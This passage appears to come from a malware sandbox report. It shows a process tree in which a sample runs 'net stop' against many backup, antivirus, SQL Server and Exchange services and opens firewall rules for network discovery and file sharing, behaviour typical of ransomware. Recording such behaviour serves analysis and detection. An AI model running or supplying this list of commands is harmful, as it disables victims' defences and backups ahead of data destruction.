      4⤵
      PID:6528
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:5756
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:6888
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQL Backups /y
    3⤵
    PID:4080
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQL Backups /y
      4⤵
      PID:6420
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:5044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:6628
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer100 /y
    3⤵
    PID:5008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer100 /y
      4⤵
      PID:5148
- - C:\Windows\system32\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:7064
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:4800
- - C:\Windows\system32\net.exe
    "net.exe" stop CAARCUpdateSvc /y
    3⤵
    PID:6540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:5816
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:5348
- - C:\Windows\system32\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:260
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfefire /y
      4⤵
      PID:5212
- - C:\Windows\system32\net.exe
    "net.exe" stop NetMsmqActivator /y
    3⤵
    PID:6820
- - C:\Windows\system32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:6008
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:5996
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:6176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:5620
- - C:\Windows\system32\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:5724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:6856
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeIS /y
    3⤵
    PID:5136
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:6788
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
      4⤵
      PID:5288
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:4480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:6300
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:6688
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
      4⤵
      PID:5328
- - C:\Windows\system32\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:5272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:5168
- - C:\Windows\system32\net.exe
    "net.exe" stop SamSs /y
    3⤵
    PID:252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SamSs /y
      4⤵
      PID:6592
- - C:\Windows\system32\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:2920
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:7084
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:392
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer /y
      4⤵
      PID:4000
- - C:\Windows\system32\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:6712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:5028
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:4508
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:4500
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:1220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:2492
- - C:\Windows\system32\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:5340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:4368
- - C:\Windows\system32\net.exe
    "net.exe" stop CASAD2DWebSvc /y
    3⤵
    PID:1340
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
      4⤵
      PID:5904
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:1416
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:3428
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:4760
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:2220
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:5060
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:4052
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:6216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:4020
- - C:\Windows\system32\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:5692
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:3960
- - C:\Windows\system32\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:6004
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ShMonitor /y
      4⤵
      PID:6024
- - C:\Windows\system32\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:4920
- - C:\Windows\system32\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:3772
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:4408
- - C:\Windows\system32\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:4436
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:4040
- - C:\Windows\system32\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:6044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:5208
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:4316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:4576
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:6124
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:4588
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:4536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
      4⤵
      PID:4320
- - C:\Windows\system32\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:4276
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:5040
- - C:\Windows\system32\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:1720
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:6360
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:2424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:7000
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:4512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:5684
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:5820
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMTA /y
      4⤵
      PID:4376
- - C:\Windows\system32\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:1468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:4632
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:6264
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:996
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:5160
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:4932
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:7116
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:4580
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:5356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:2252
- - C:\Windows\system32\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:6396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:7132
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:4808
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
      4⤵
      PID:6492
- - C:\Windows\system32\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:6240
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:5924
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:6164
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:5464
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:6576
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:6420
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
      4⤵
      PID:6392
- - C:\Windows\system32\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:4152
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:3992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:6020
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:4996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:1252
- - C:\Windows\system32\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:6432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:5008
- - C:\Windows\system32\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:3404
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:5488
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:5532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:6000
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:6372
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:5444
- - C:\Windows\system32\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:7128
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop audioendpointbuilder /y
      4⤵
      PID:7048
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:5468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:5264
- - C:\Windows\system32\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:6428
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:6520
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:6812
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:5204
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:5620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
      4⤵
      PID:5456
- - C:\Windows\system32\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:5544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “aphidmonitorservice” /y
      4⤵
      PID:6380
- - C:\Windows\system32\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:3484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:4688
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:5796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:2292
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:3724
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:3276
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:6268
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:3968
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:4480
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:4332
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:1484
- - C:\Windows\system32\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:3980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:6040
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:4916
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:2108
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:6016
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:3572
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:4368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:4168
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:4644
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:1092
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcrSch2Svc /y
      4⤵
      PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:3136
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:1352
- - C:\Windows\system32\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:2616
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:5452
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:2628
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:740
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:1396
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
      4⤵
      PID:4428
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:2456
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:4100
- - C:\Windows\system32\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:4784
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:5180
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:3308
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4528
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:4612
- - C:\Windows\system32\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:5764
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:6476
- - C:\Windows\system32\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:4912
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:6116
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:5584
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:4636
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:4252
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:5948
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:6664
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:6048
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:4492
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_service /y
      4⤵
      PID:5936
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:4296
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:5928
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:6108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:3952
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:5672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:7012
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:4568
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:5236
- - C:\Windows\system32\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:4212
- - C:\Windows\system32\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:5856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:4760
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:6216
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:748
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:5740
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:6644
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:6436
- - C:\Windows\system32\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:1256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:3752
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:3980
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:5364
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:3080
- - C:\Windows\system32\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:6460
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:4816
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:6504
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:5152
- - C:\Windows\system32\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:7148
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:5780
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
    PID:256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:4624
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:3992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:5912
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5156
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:6704
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTTICEBGC /y
    3⤵
    PID:6432
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
      4⤵
      PID:4780
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:5084
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:264
- - C:\Windows\system32\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:6304
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:252
- - C:\Windows\system32\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:6712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop DCAgent /y
      4⤵
      PID:6376
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Web Control Service” /y
    3⤵
    PID:5272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
      4⤵
      PID:2972
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:6520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:4148
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecJobEngine /y
    3⤵
    PID:4804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecJobEngine /y
      4⤵
      PID:5456
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:4152
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:6104
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecDeviceMediaService /y
    3⤵
    PID:1340
- - C:\Windows\system32\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:6532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:5248
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROD /y
    3⤵
    PID:6344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROD /y
      4⤵
      PID:5044
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    PID:5056
- - C:\Windows\system32\net.exe
    "net.exe" stop AcronisAgent /y
    3⤵
    PID:5996
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AcronisAgent /y
      4⤵
      PID:4696
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:6880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:5328
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:5496
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:5536
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:6592
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecManagementService /y
    3⤵
    PID:6552
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecManagementService /y
      4⤵
      PID:6088
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:6556
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PROFXENGAGEMENT /y
    3⤵
    PID:5580
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
      4⤵
      PID:7084
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:5960
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyScheduler /y
      4⤵
      PID:4648
- - C:\Windows\system32\net.exe
    "net.exe" stop Antivirus /y
    3⤵
    PID:5520
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Antivirus /y
      4⤵
      PID:4516
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecRPCService /y
    3⤵
    PID:4728
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecRPCService /y
      4⤵
      PID:6056
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:5916
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:3016
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:4900
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:5972
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:3716
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:2368
- - C:\Windows\system32\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:2496
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:6836
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:5012
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:4892
- - C:\Windows\system32\arp.exe
